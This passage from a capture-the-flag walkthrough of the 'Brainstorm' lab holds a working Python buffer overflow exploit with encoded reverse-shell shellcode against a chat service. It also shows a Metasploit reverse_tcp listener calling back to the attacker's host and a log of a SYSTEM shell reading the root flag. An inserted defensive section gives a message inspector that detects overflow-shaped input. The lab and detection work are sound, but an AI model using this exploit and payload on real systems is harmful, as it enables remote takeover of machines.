buf += b"\xa1\x5c\x20\xea\x85\xc2\xdb\xd9\x96\x05\x23\x9c\xae"
buf += b"\x7e\x12\x0a\x8e\xe8\x5b\xda\x0e\xe9\x0d\xb0\x0e\x81"
buf += b"\xe9\xe0\x5d\xb4\xf5\x3c\xf2\x65\x60\xbf\xa2\xda\x23"
buf += b"\xd7\x48\x04\x03\x78\xb3\x63\x17\x7f\x4b\xf1\x30\xd8"
buf += b"\x23\x09\x01\xd8\xb3\x63\x81\x88\xdb\x78\xae\x27\x2b"
buf += b"\x80\x65\x60\x23\x0b\xe8\xc2\xd2\x0c\x21\x82\x4a\x0c"
buf += b"\xc6\x1f\x7d\x77\xa7\xa0\x7e\x88\xa1\xc4\x7f\x88\xcd"
buf += b"\xfa\xbc\x5e\xf4\x88\x83\x62\x43\x82\xb6\xc7\xe2\x09"
buf += b"\xb8\x54\xf4\x1b"
shellcode = buf

nop_sled = b"\x90" * 32   # gives the shikata_ga_nai decoder room to unpack
message = b"A" * offset + new_eip + nop_sled + shellcode + b"C" * (total_length - offset - len(new_eip) - len(nop_sled) - len(shellcode))

try:
    print("Sending payload")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.10.53.141", 9999))
    s.recv(1024)               # welcome banner
    s.recv(1024)               # username prompt
    s.send(username + b"\r\n")
    s.recv(1024)               # message prompt
    s.send(message + b"\r\n")
    s.recv(1024)
    s.close()
except:
    print("Cannot connect to the machine")
    sys.exit()
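Seen from the defender's side, the message the scripts above build has a shape nothing in normal chat traffic shares: a 2012-byte run of one filler byte, a 4-byte return address, a NOP sled and several hundred bytes of encoded code, all delivered as a single line to port 9999. The following is an added example, not part of the original walkthrough: a small inspector that a proxy, an IDS rule or the chat server itself could apply to each username and message before processing it. MAX_MESSAGE and MIN_RUN are assumed thresholds (the banner's 20-character username limit is the only one the service states); the sample messages are constructed, and the byte range standing in for shellcode is not the encoded payload from the page.

```python
MAX_USERNAME = 20          # limit announced by the server banner
MAX_MESSAGE = 1024         # assumed limit for a chat line; the crash needs more than 2012 bytes
MIN_RUN = 64               # assumed: one byte repeated this often is padding, not chat
NOP_SLED = b"\x90" * 16    # x86 NOP run as used in front of shellcode


def longest_byte_run(data: bytes) -> tuple:
    """Return (byte_value, run_length) for the longest run of one repeated byte."""
    best = (None, 0)
    i = 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i > best[1]:
            best = (data[i], j - i)
        i = j
    return best


def inspect_message(raw: bytes) -> list:
    """Tags describing why a chat message looks like an overflow attempt; [] if clean."""
    payload = raw.rstrip(b"\r\n")          # the protocol terminates lines with CRLF
    tags = []
    if len(payload) > MAX_MESSAGE:
        tags.append("oversized")
    value, run = longest_byte_run(payload)
    if run >= MIN_RUN:
        tags.append("long-run")            # e.g. 2012 x "A" used to reach the return address
    if NOP_SLED in payload:
        tags.append("nop-sled")
    binary = sum(1 for b in payload if b < 0x20 or b > 0x7E)
    if payload and binary * 4 > len(payload):
        tags.append("binary")              # more than a quarter non-printable: encoded code, not text
    return tags


def inspect_username(raw: bytes) -> list:
    name = raw.rstrip(b"\r\n")
    return ["oversized-username"] if len(name) > MAX_USERNAME else []


# Constructed samples: an ordinary chat line and a 2400-byte message laid out like the
# exploit (filler, 4-byte address, 32-byte NOP sled, 255 arbitrary bytes in place of
# shellcode, trailing padding). The byte range is a stand-in, not real shellcode.
BENIGN = b"hello everyone, anyone around?\r\n"
OVERFLOW_SHAPED = (b"A" * 2012 + b"BBBB" + b"\x90" * 32
                   + bytes(range(1, 256)) + b"C" * 97 + b"\r\n")

if __name__ == "__main__":
    for label, msg in (("benign", BENIGN), ("overflow-shaped", OVERFLOW_SHAPED)):
        print("%-16s %5d bytes -> %s" % (label, len(msg), inspect_message(msg) or ["clean"]))
```

The server-side fix is the same check in reverse: reject or truncate any line longer than the buffer it is copied into before the copy happens, which is the bound the vulnerable chatserver never applies.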
Setting up listener:
┌──(root??kali)-[~]
└─# msfconsole
[msfconsole ASCII-art banner]

       =[ metasploit v6.0.45-dev                          ]
+ -- --=[ 2134 exploits - 1139 auxiliary - 364 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]
Metasploit tip: Enable verbose logging with set VERBOSE
true
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target
msf6 exploit(multi/handler) > set LHOST 10.2.23.54
LHOST => 10.2.23.54
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.2.23.54:4444
Running the exploit:
┌──(root??kali)-[~/Buffer Overflow/thmbfprep/brainstorm/chatserver]
└─# python3 exploit.py
Sending payload
Reverse Shell:
[*] Sending stage (175174 bytes) to 10.10.53.141
[*] Meterpreter session 1 opened (10.2.23.54:4444 -> 10.10.53.141:49271) at 2023-02-07 07:28:25 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
**Computer : BRAINSTORM**
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 0
**Meterpreter : x86/windows**
meterpreter > shell
Process 2032 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\
cd C:\
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is C87F-5040
Directory of C:\
08/29/2019 07:36 PM <DIR> ftp
08/29/2019 07:31 PM <DIR> inetpub
07/13/2009 07:20 PM <DIR> PerfLogs
11/20/2010 11:16 PM <DIR> Program Files
08/29/2019 07:28 PM <DIR> Program Files (x86)
08/29/2019 09:20 PM <DIR> Users
09/02/2019 04:36 PM <DIR> Windows
0 File(s) 0 bytes
7 Dir(s) 19,594,682,368 bytes free
C:\>cd users
cd users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is C87F-5040
Directory of C:\Users
08/29/2019 09:20 PM <DIR> .
08/29/2019 09:20 PM <DIR> ..
08/29/2019 09:21 PM <DIR> drake
11/20/2010 11:16 PM <DIR> Public
0 File(s) 0 bytes
4 Dir(s) 19,594,682,368 bytes free
C:\Users>cd drake
cd drake
C:\Users\drake>dir
dir
Volume in drive C has no label.
Volume Serial Number is C87F-5040
Directory of C:\Users\drake
08/29/2019 09:21 PM <DIR> .
08/29/2019 09:21 PM <DIR> ..
08/29/2019 09:21 PM <DIR> Contacts
08/29/2019 09:55 PM <DIR> Desktop
08/29/2019 09:21 PM <DIR> Documents
08/29/2019 09:27 PM <DIR> Downloads
08/29/2019 09:21 PM <DIR> Favorites
08/29/2019 09:21 PM <DIR> Links
08/29/2019 09:21 PM <DIR> Music
08/29/2019 09:21 PM <DIR> Pictures
08/29/2019 09:21 PM <DIR> Saved Games
08/29/2019 09:21 PM <DIR> Searches
08/29/2019 09:21 PM <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 19,594,682,368 bytes free
C:\Users\drake>cd Desktop
cd Desktop
C:\Users\drake\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is C87F-5040
Directory of C:\Users\drake\Desktop
08/29/2019 09:55 PM <DIR> .
08/29/2019 09:55 PM <DIR> ..
08/29/2019 09:55 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 19,594,682,368 bytes free
C:\Users\drake\Desktop>type root.txt
type root.txt
**5b1001de5a44eca47eee71e7942a8f8a**